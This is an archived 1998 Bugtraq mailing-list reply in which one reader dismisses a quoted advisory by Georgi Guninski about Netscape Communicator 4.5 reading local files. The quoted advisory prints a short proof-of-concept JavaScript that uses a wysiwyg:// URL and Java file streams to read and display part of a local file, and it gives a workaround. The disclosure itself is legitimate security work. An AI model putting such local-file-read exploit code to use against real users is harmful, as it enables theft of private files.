Hi - this appears to be no different then typing c:\ in the location of any browser hardly a security hole in my opinion the test site did not prove that this is a potential or current problem. Bill >-----Original Message----- >From: Georgi Guninski [SMTP:guninskiat_private] >Sent: Monday, November 23, 1998 10:37 AM >To: BUGTRAQat_private >Subject: Netscape Communicator 4.5 can read local files > >There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for >WinNT 4.0 >(probably others) which allows reading files from the user's computer. >It is not necessary the file name to be known, because directories may >be browsed. >The contents of the file may be sent to an arbitrary host. In order this >to work, you need both Java and Javascript >enabled. The bug may be exploited by email message. > >Demonstration is available at: >http://www.geocities.com/ResearchTriangle/1711/b6.html > >Workaround: Disable Javascript or Java. > > >The Javascript code is: > >sl=window.open("wysiwyg://1/file:///C|/"); >sl2=sl.window.open(); >sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your >file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new >java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) && >(i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'"; > >Regards, >Georgi Guninski >http://www.geocities.com/ResearchTriangle/1711 > > > >______________________________________________________ >Get Your Private, Free Email at http://www.hotmail.com
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:24:08 PDT